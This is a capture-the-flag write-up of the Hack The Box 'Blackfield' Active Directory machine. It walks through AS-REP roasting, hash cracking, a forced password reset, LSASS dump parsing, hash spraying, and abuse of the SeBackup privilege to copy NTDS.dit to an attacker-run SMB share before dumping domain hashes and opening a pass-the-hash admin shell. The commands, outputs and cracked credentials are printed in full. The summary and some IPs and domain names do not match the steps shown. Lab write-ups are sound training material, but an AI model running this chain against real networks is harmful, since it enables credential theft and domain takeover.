Blackfield (HTB) - Writeup

Pwned by: ziliel Target: Blackfield

Pwn Date: 2025.06.14

We started by enumerating users via SMB and LDAP, then identified accounts vulnerable to **AS-REP roasting**. After cracking a hash, we gained initial access and moved on to **Kerberoasting** to obtain another set of credentials. Using those, we accessed a file share with a backup of the **NTDS.dit** and **SYSTEM** hive. We used these to dump domain hashes and eventually escalated to **DOMAIN ADMIN** by abusing privileges and extracting secrets from the domain controller.

Enumeration

Nmap

We start with looking for open ports and running services on the target.

```
ports=$(nmap -p- --min-rate=1000 -T4 10.129.229.17 | grep ^[0-9] | cut -d
'/' -f1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.129.229.17 > nmap-deepscan.txt
```

```
(ziliel⊕ziliel)-[/media/.../Writeups/OWN/Blackfield/scans]
 -$ ports=$(nmap -p- --min-rate=1000 -T4 10.129.229.17 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s,
,$//)
map -sC -sV -p$ports 10.129.229.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 22:53 CEST
Nmap scan report for 10.129.229.17
Host is up (0.17s latency).
        STATE SERVICE
                             VERSION
PORT
                         Simple DNS Plus
53/tcp
        open domain
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-10 03:54:01Z)
135/tcp open msrpc
                           Microsoft Windows RPC
389/tcp open ldap
                            Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Defa
ult-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http
                            Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap
                            Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Defa
ult-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
 smb2-security-mode:
   3:1:1:
     Message signing enabled and required
 smb2-time:
   date: 2025-07-10T03:54:05
   start_date: N/A
 _clock-skew: 7h00m07s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.95 seconds
```

We can see that the LDAP Domain is BLACKFIELD.local.

Enum4Linux

Lets enumerate further with a Enum4Linux scan.

```
enum4linux -a 10.129.229.17 > enum4linux.txt
```

found (nothing)

Idapsearch

Lets do a ldapsearch scan for further enumeration.

```
ldapsearch -x -H ldap://10.129.229.17 -b "DC=BLACKFIELD,DC=local" >
ldapsearch-base.txt
```

```
(ziliel® ziliel)-[/media/.../Writeups/OWN/Blackfield/scans]
$ cat ldapsearch-base.txt
# extended LDIF
#
# LDAPv3
# base <DC=BLACKFIELD,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
```

found (nothing)

SMBClient

Lets check if there are any shares we can find.

```
smbclient -L //10.129.229.17/ > smbclient-L.txt
```

```
-(ziliel®ziliel)-[/media/.../Writeups/OWN/Blackfield/scans]
 -$ cat smbclient-L.txt
Password for [WORKGROUP\ziliel]:
       Sharename
                       Type
                                 Comment
       ADMIN$
                       Disk
                                 Remote Admin
       C$
                       Disk
                                 Default share
       forensic
                       Disk
                                 Forensic / Audit share.
                       IPC
       IPC$
                                 Remote IPC
       NETLOGON
                       Disk
                                 Logon server share
       profiles$
                       Disk
       SYSV0L
                       Disk
                                 Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
```

we can successfully list shares.

Checking to which ones we have Reading rights leads us to the profiles\$ share which contains a lot of Sub Directories. Each folder has names which are suspected to be usernames.

```
-(ziliel®ziliel)-[/media/.../Writeups/OWN/Blackfield/scans]
 -$ smbclient -N //10.129.229.17/profiles$
Try "help" to get a list of possible commands.
smb: \> ls
                                     D
                                              0 Wed Jun 3 18:47:12 2020
                                     D
                                              0 Wed Jun 3 18:47:12 2020
  AAlleni
                                              0 Wed Jun 3 18:47:11 2020
                                     D
  ABarteski
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  ABekesz
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  ABenzies
                                              0 Wed Jun 3 18:47:11 2020
                                     D
  ABiemiller
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  AChampken
                                     D
                                              0 Wed Jun 3 18:47:11 2020
  ACheretei
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  ACsonaki
                                             0 Wed Jun 3 18:47:11 2020
                                     D
  AHigchens
                                     D
                                             0 Wed Jun 3 18:47:11 2020
 AJaquemai
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  AKlado
                                     D
                                             0 Wed Jun 3 18:47:11 2020
  AKoffenburger
                                     D
                                             0 Wed Jun 3 18:47:11 2020
 AKollolli
                                                Wed Jun 3 18:47:11 2020
                                     D
                                             0
  AKruppe
                                     D
                                              0
                                                Wed Jun
                                                         3 18:47:11 2020
  AKubale
                                     D
                                                Wed Jun 3 18:47:11 2020
 ALamerz
                                     D
                                              0
                                                Wed Jun 3 18:47:11 2020
```

And a lot more!

We want to make a usernames.txt file which contains all the Directory names we can see in this share. Lets First list out the content of the share into a txt file.

```
smbclient -N //10.129.229.17/profiles$ -c 'ls' > smb-ls.txt
```

Good. Now lets extract only the names.

```
grep -oP '^\s+\K\w+' smb-ls.txt > usernames.txt
```

```
-(ziliel@ziliel)-[/media/.../Writeups/OWN/Blackfield/scans]
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
```

And we have a username list which we can use for Bruteforcing like Automated AS-REP Roasting and much more!

AS-REP Roasting

Lets do a Automated AS-REP Roasting Attack with a short Bash script which uses the GetNPUsers.py script from impacket.

```
while read p; do python3 GetNPUsers.py egotistical-bank.local/"$p" -
request -no-pass -dc-ip 10.129.168.245 >> hash.txt; done < usernames.txt</pre>
```

```
[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD.LOCAL:d9d4fd855629d4dde35bdfe2bc6bc5de$419beee5694c3c887ea5555d4c466913a503
e15c0bb49a934d82f29caff560bb1858e3c028a7582ccb32073f776179dbc241dc7eb9a1230c47c574f5d90e57c5c89615d246c4fda8
f1ae56513cd36fe8a82719e9c773417a65bc2e3332a841da940501e8c8282990fbe5fcf850b9fe325c02165a2402a1e7cab3235f51a0
3f63cd378cc6197a31efb0d0533608bf6f347855e70800f3287f89d1944635a209f9a8dc08ad90a314d592256aa9c1b3fad2dcde9e6c
32dffe0f71236e36d59e309606d48c75795615752454aa92c2469d855b896032ff013bae5c0376ef45b0499cff2d0218dbd8c96fc850
854761c1fa32fa8d0b8b
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
```

As we can see our script did find a TGT (Ticket Granting Ticket) Hash for the user support.

Hashcat

Lets crack the hash with Hashcat.

```
hashcat -a 0 -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
```

\$krb5asrep\$23\$support@BLACKFIELD.LOCAL:d9d4fd855629d4dde35bdfe2bc6bc5de\$419beee5694c3c887ea5555d4c466913a503
e15c0bb49a934d82f29caff560bb1858e3c028a7582ccb32073f776179dbc241dc7eb9a1230c47c574f5d90e57c5c89615d246c4fda8
f1ae56513cd36fe8a82719e9c773417a65bc2e3332a841da940501e8c8282990fbe5fcf850b9fe325c02165a2402a1e7cab3235f51a0
3f63cd378cc6197a31efb0d0533608bf6f347855e70800f3287f89d1944635a209f9a8dc08ad90a314d592256aa9c1b3fad2dcde9e6c
32dffe0f71236e36d59e309606d48c75795615752454aa92c2469d855b896032ff013bae5c0376ef45b0499cff2d0218dbd8c96fc850
854761c1fa32fa8d0b8b:#00^BlackKnight

We can see the password is #00^BlackKnight.

Bloodhound

Lets collect data for Bloodhound with the tool bloodhound-python with our access to the support user.

```
bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.129.229.17 -c All
```

The Program dumped a lot of data. we put all of them in one zip file and continue.

Lets start Neo4j and the <u>Bloodhound GUI</u>. If you do this for the first time you might find yourself in a BIG struggle just starting Bloodhound like me and you might avoid Bloodhound and all machines related to it for 3 days until you finally get it running on the 4th day. (If that's the case I'll see you in 4 days. bye bye)

```
sudo neo4j console
./BloodHound
```

Lets upload our zip archive with our dumped data.



Search for the following Cypher query at the bottom of the screen:

```
MATCH p=(u {owned: true})-[r1]->(n) WHERE r1.isacl=true RETURN p
```

With this query we can find Attack vectors that are based on access control permissions what means that Bloodhound will show if our owned user has any permissions over other users that we could misuse for lateral movement or priv esc.



As we see the support user which we own has ForceChangePassword permissions over the audit2020 user.

Initial Access

rpcclient

This means we can change the password of the audit2020 user without knowing the previous one with rpcclient.

```
rpcclient -U blackfield/support 10.129.159.148
rpcclient $> setuserinfo audit2020 23 h@CKTHe0x!
```

crackmapexec

Now lets enumerate smb with crackmapexec and our new credential set.

```
crackmapexec smb 10.129.159.148 -u audit2020 -p 'h@CKTHe0x!' --shares
```

```
10.129.159.148 445
                                                     [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
                                                     [+] BLACKFIELD.local\audit2020:H@CKTHEB0X#
           10.129.159.148 445
           10.129.159.148 445
SMB
                                   DC01
                                                     [+] Enumerated shares
           10.129.159.148 445
SMB
                                   DC01
                                                                     Permissions
                                                     Share
                                                                                      Remark
           10.129.159.148
                            445
                                   DC01
                                                     ADMIN$
                                                                                      Remote Admin
SMR
            10.129.159.148 445
                                   DC01
                                                     c$
SMB
           10.129.159.148 445
                                                                                      Default share
                                   DC01
                                                     forensic
SMB
           10.129.159.148 445
                                   DC01
                                                                     READ
                                                                                      Forensic / Audit share.
           10.129.159.148 445
                                                                     READ
                                                                                      Remote IPC
SMR
                                   DC01
                                                     IPC$
                                                                                     Logon server share
SMB
           10.129.159.148
                            445
                                   DC01
                                                     NETLOGON
                                                                     READ
                                                     profiles$
            10.129.159.148
                            445
                                   DC01
                                                     SYSVOL
                                                                     READ
            10.129.159.148
                            445
                                                                                      Logon server share
                                   DC01
```

We find out that now we have access to the forensic share.

Lets look if we find something interesting.

```
smb: \memory_analysis\> ls
                                      D
                                               0 Thu May 28 22:28:33 2020
                                                  Thu May 28 22:28:33 2020
  conhost.zip
                                      A 37876530
                                                 Thu May 28 22:25:36 2020
  ctfmon.zip
                                      A 24962333
                                                 Thu May 28 22:25:45 2020
  dfsrs.zip
                                      A 23993305
                                                  Thu May 28 22:25:54 2020
  dllhost.zip
                                      A 18366396 Thu May 28 22:26:04 2020
  ismserv.zip
                                      A 8810157
                                                  Thu May 28 22:26:13 2020
  lsass.zip
                                      A 41936098 Thu May 28 22:25:08 2020
  mmc.zip
                                      A 64288607
                                                 Thu May 28 22:25:25 2020
  RuntimeBroker.zip
                                      A 13332174 Thu May 28 22:26:24 2020
  ServerManager.zip
                                      A 131983313 Thu May 28 22:26:49 2020
  sihost.zip
                                      A 33141744 Thu May 28 22:27:00 2020
  smartscreen.zip
                                      A 33756344
                                                  Thu May 28 22:27:11 2020
  svchost.zip
                                      A 14408833
                                                 Thu May 28 22:27:19 2020
  taskhostw.zip
                                      A 34631412
                                                  Thu May 28 22:27:30 2020
  winlogon.zip
                                      A 14255089
                                                  Thu May 28 22:27:38 2020
  wlms.zip
                                         4067425
                                                  Thu May 28 22:27:44 2020
  WmiPrvSE.zip
                                      A 18303252
                                                  Thu May 28 22:27:53 2020
                5102079 blocks of size 4096. 1690122 blocks available
```

The lsass.zip file seems interesting. Lets Download it.

Credentials get stored in LSASS memory when a user or process logs in or runs something using credentials—like logging in locally, via RDP, RunAs, services, PsExec, WinRM, or scheduled tasks—as long as the session is still active since the last reboot .

lsass.DMP

The zip file contains a minidump of the LSASS process (Local Security Authority Subsystem Service).

pypykatz

We use pypykatz to read the file content.

```
pypykatz lsa minidump lsass.DMP
```

We find a lot of credential combinations that were used after the last reboot.

Idapsearch

Before spraying credentials against the server, lets check the account lockout policy.

```
ldapsearch -D 'BLACKFIELD\support' -w '#00^BlackKnight' -p 389 -h
10.10.10.192 -
b "dc=blackfield,dc=local" -s sub "*" | grep lockoutThreshold
```

lockoutThreshold: 0

pypykatz

After confirming that we wont be locked out if we spray credentials. Lets start with extracting and saving all hashes and users.

```
pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{ print $2 }' | sort -
u >
hashes
```

```
pypykatz lsa minidump lsass.DMP | grep 'Username:' | awk '{ print $2 }' |
sort -
u > users
```

crackmapexec

Now we can spray them and find new SMB credentials.

```
crackmapexec smb 10.129.159.148 -u users -H hashes
```

We successfully find a working credential combination.

svc_backup:9658d1d1dcd9250115e2205d9f48400d

Evil-WinRm

```
_____(ziliel@ ziliel)-[/media/ziliel/SynchMedia/Synched_Media/OSCP+/OSCP_Notes/new/Writeups/OWN/Blackfield/sca
ns]
_$ evil-winrm -i evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d^Cu svc_backup
_H 9658d1d1dcd9250115e2205d9f48400d
____(ziliel@ ziliel)-[/media/ziliel/SynchMedia/Synched_Media/OSCP+/OSCP_Notes/new/Writeups/OWN/Blackfield/sca
ns]
_$ evil-winrm -i 10.129.159.148 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_pro
c' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-c
ompletion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> \[
*Evil-WinRM*
```

We successfully found the user.txt flag.

3920bb317a0bef51027e2852be64b543

Privilege Escalation

Whoami

Lets check what privileges we have as the audit2020 user.

```
Info: Establishing connection to remote endpoint
Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
Privilege Name
                          Description
                                                      State
------
SeMachineAccountPrivilege
                          Add workstations to domain
                                                      Enabled
SeBackupPrivilege
                          Back up files and directories Enabled
SeRestorePrivilege
                          Restore files and directories Enabled
SeShutdownPrivilege
                          Shut down the system
                                                      Enabled
SeChangeNotifyPrivilege
                          Bypass traverse checking
                                                      Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
```

We see we have the SeBackup privilege which we can misuse.

robocopy

Lets extract the Desktop content of the Administrator user by creating a backup with the robocopy tool.

```
robocopy /b C:\Users\Administrator\Desktop\ C:\
```

```
*Evil-WinRM* PS C:\> cat notes.txt

Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.
```

We could only backup the notes.txt file. Reading it reveals that the root.txt flag got encrypted. We suspect EFS which is blocking our access with robocopy.

WBAdmin Hash Dumping

We abuse SeBackup and SeRestore privileges and dump the AD Database. The we do a Pass the Hash attack with the dumped admin NTLM hash.

Lets start with installing and configuring a samba server with authentication. Modify the contents of the /etc/samba/smb.conf file to:

```
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
```

Then create a user that matches the user in the force user parameter.

```
adduser smbuser
```

Now create a password for our new user.

```
smbpasswd -a smbuser
```

Continue with starting the SMB demon with service smbd restart. Now we can mount the share in our Win-Rm Session.

```
net use k: \\10.10.14.3\smb /user:smbuser smbpass
```

Lets Backup the NTDS folder with wbadmin on in win-rm.

```
echo "Y" | wbadmin start backup -backuptarget:\\10.129.229.17\smb - include:c:\windows\ntds
```

Lets retrieve the version of the backup.

```
wbadmin get versions
```

Now we can restore the NTDS.dit file, specifying the backup version.

```
echo "Y" | wbadmin start recovery -version:14/06/2025-17:23 -itemtype:file
-
items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```

Now we need to extract the system.hive file then download both to out local machine.

```
reg save HKLM\SYSTEM C:\system.hive
```

Now copy the files to our machine using our mounted SMB drive.

```
cp ntds.dit \\10.129.229.17\smb\NTDS.dit
cp system.hive \\10.129.229.17\smb\system.hive
```

secretsdump

Now lets extract all the hashes from the domain using impacket-secretsdump.

```
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL
```

```
[*] Reading and decrypting hashes from NTDS.dit
Administrator:500:184fb5e5178480be64824d4cd53b99ee:::
```

We find the Admin hash.

Lets get a admin shell with wmiexec.

```
wmiexec.py -hashes :184fb5e5178480be64824d4cd53b99ee
administrator@10.129.229.17
```

```
(ziliel® ziliel)-[/media/ziliel/SynchMedia/Synched_Media/OSCP+/OSCP_Notes/new/Writeups/OWN/Blackfield/sca
ns]

$\sum_$ python3 /media/ziliel/SANDISK-256/scripts/impacket-0.12.0/examples/wmiexec.py -hashes :184fb5e5178480be6
4824d4cd53b99ee administrator@10.129.229.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
```

C:\Users\Administrator\Desktop>type root.txt 4375a629c7c67c8e29db269060c955cb

Found the root.txt flag.